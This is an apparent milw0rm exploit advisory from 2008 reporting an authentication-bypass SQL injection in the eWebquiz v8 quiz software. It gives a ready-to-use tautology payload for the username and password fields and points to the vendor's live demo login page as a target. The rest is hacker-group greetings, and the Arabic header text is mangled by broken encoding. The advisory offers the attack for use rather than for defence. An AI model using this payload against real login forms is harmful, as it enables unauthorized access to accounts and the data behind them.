1 [~] −−−−−−−−−−−−−−−−−−−−−−−−−−−−بسÙM−^E اÙM−^DÙM−^DÙM−^G اÙM−^DرØ-ÙM−^EÙM−^F اÙM−^DرØ-ÙM−^JÙM−^E−−−−−−−−−−−−−−
−−−−−−−−−−−−−−−−
2 ÙM−^HÙM−^Eا Ø£ÙM−^HتÙM−^JتÙM−^E ÙM−^EÙM−^F اÙM−^DعÙM−^DÙM−^E اÙM−^DØ
§ ÙM−^BÙM−^DÙM−^JÙM−^Dا
3 [~]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−صدÙM−^B اÙM−^DÙM−^DÙM−^G اÙM−^DعظÙM−^JÙM−^E−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
4
5 [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
6
7 [~]Vendor: www.activewebsoftwares.com
8
9 [~]Software: eWebquiz v 8
10
11 [~]author: ((ÑM−^O3d D3v!L))
12
13 [~] Date: 28.11.2008
14
15 [~] Home: www.ahacker.biz
16
17 [~] contact: N/A
18
19 [~] −−−−−−−−−−−−−−−−−−−−−−−−−−−−−{str0ke}−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
20
21
22 [~] Exploit:
23
24 username: r0’ or ’ 1=1−−
25 password: r0’ or ’ 1=1−−
26
27
28 [~]login 4 d3m0:
29
30 http://www.activewebsoftwares.com/demoewebquiz/register.asp
31
32 [~]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−{str0ke}−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
33
34 [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
35 [~]
36 [~] spechial thanks : dolly & 7am3m & عÙM−^Eاد ,اÙM−^DزÙM−^GÙM−^JرÙM−^J
37 [~]
38 [~] EV!L !NS!D3 734M −−− R3d−D3v!L−−EXOT!C −−poison scorbion −−samakiller
39 [~]
40 [~] xp10.biz & ahacker.biz
41 [~]
42
43 [~]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
44
45 # milw0rm.com [2008−11−29]
Page 1/1
eWebquiz v 8 Auth Bypass Remote SQL Injection Vulnerability
R3d−D3v!L
11/29/2008